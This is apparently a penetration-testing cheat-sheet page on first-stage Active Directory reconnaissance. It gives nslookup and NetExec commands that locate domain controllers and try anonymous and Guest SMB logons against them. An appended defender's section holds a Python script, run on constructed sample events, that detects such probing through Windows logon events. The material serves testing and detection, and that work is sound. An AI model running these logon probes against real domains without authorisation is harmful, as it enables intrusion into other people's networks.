Active Directory First Lookup
Prerequisites
- Network route to at least one domain controller.
Exploit
First, let’s identify domain controllers of the Active Directory domain you are targeting.
# Get domain name.
nmcli dev show $Interface | grep -i "domain"
# Get domain controller IPs.
nslookup $DomainName
Now, using NetExec, try to authenticate anonymously (empty username and password) and as Guest.
# Get domain controller system info.
nxc smb $DomainControllersIPs
# Authenticate as Guest, then anonymously.
# --local-auth checks the host's local accounts instead of the domain.
nxc smb $DomainControllerIP -d $DomainName -u 'Guest' -p ''
nxc smb $DomainControllerIP -d $DomainName -u 'Guest' -p '' --local-auth
nxc smb $DomainControllerIP -d $DomainName -u '' -p ''
nxc smb $DomainControllerIP -d $DomainName -u '' -p '' --local-auth
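
The defender's view of the procedure above, as an added example that is not part of the original page: with logon auditing enabled, these attempts reach the domain controller as network logon events (4624 success, 4625 failure, logon type 3), and this script flags any source that tries both anonymous and Guest logons within one minute. The JSON-lines export shape, the function names and every sample record are constructed assumptions.

```python
import json
from datetime import datetime, timedelta

ANONYMOUS_SID = "S-1-5-7"  # well-known SID of ANONYMOUS LOGON
GUEST_RID = "-501"         # built-in Guest keeps RID 501 even when renamed

# Constructed sample: Security events exported as JSON lines (assumed shape).
SAMPLE_EVENTS = """\
{"EventID": 4625, "TimeCreated": "2024-01-01T10:00:01", "LogonType": 3, "TargetUserName": "Guest", "TargetUserSid": "S-1-0-0", "IpAddress": "192.0.2.50"}
{"EventID": 4624, "TimeCreated": "2024-01-01T10:00:03", "LogonType": 3, "TargetUserName": "ANONYMOUS LOGON", "TargetUserSid": "S-1-5-7", "IpAddress": "192.0.2.50"}
{"EventID": 4624, "TimeCreated": "2024-01-01T10:00:04", "LogonType": 3, "TargetUserName": "alice", "TargetUserSid": "S-1-5-21-1111-2222-3333-1104", "IpAddress": "192.0.2.50"}
{"EventID": 4624, "TimeCreated": "2024-01-01T10:05:00", "LogonType": 3, "TargetUserName": "ANONYMOUS LOGON", "TargetUserSid": "S-1-5-7", "IpAddress": "192.0.2.21"}
{"EventID": 4624, "TimeCreated": "2024-01-01T09:00:00", "LogonType": 3, "TargetUserName": "visitor", "TargetUserSid": "S-1-5-21-1111-2222-3333-501", "IpAddress": "192.0.2.33"}
{"EventID": 4624, "TimeCreated": "2024-01-01T09:30:00", "LogonType": 3, "TargetUserName": "ANONYMOUS LOGON", "TargetUserSid": "S-1-5-7", "IpAddress": "192.0.2.33"}
"""

def classify(event):
    """Return 'anonymous', 'guest' or None for one logon event."""
    if event["EventID"] not in (4624, 4625) or event["LogonType"] != 3:
        return None  # only successful/failed network logons are relevant
    sid = event.get("TargetUserSid", "")
    name = event.get("TargetUserName", "").lower()
    if sid == ANONYMOUS_SID or name == "anonymous logon":
        return "anonymous"
    # Match Guest by RID so a renamed account is still caught; failed logons
    # typically carry the NULL SID (S-1-0-0), so fall back to the name there.
    if (sid.startswith("S-1-5-21-") and sid.endswith(GUEST_RID)) or name == "guest":
        return "guest"
    return None

def find_probes(lines, window=timedelta(seconds=60)):
    """Return source IPs that tried anonymous AND Guest logons within `window`.

    Anonymous logons alone can be routine on a domain controller, so the
    pairing from a single source is used as the signal.
    """
    seen = {}     # ip -> {kind: latest timestamp}
    flagged = []
    for line in filter(str.strip, lines.splitlines()):
        event = json.loads(line)
        kind = classify(event)
        if kind is None:
            continue
        ip = event["IpAddress"]
        ts = datetime.fromisoformat(event["TimeCreated"])
        seen.setdefault(ip, {})[kind] = ts
        other_ts = seen[ip].get("guest" if kind == "anonymous" else "anonymous")
        if other_ts is not None and abs(ts - other_ts) <= window and ip not in flagged:
            flagged.append(ip)
    return flagged
```

Calling `find_probes(SAMPLE_EVENTS)` on the constructed records returns only the source that paired a Guest attempt with an anonymous logon two seconds apart; the lone anonymous logon and the pair 30 minutes apart are not flagged.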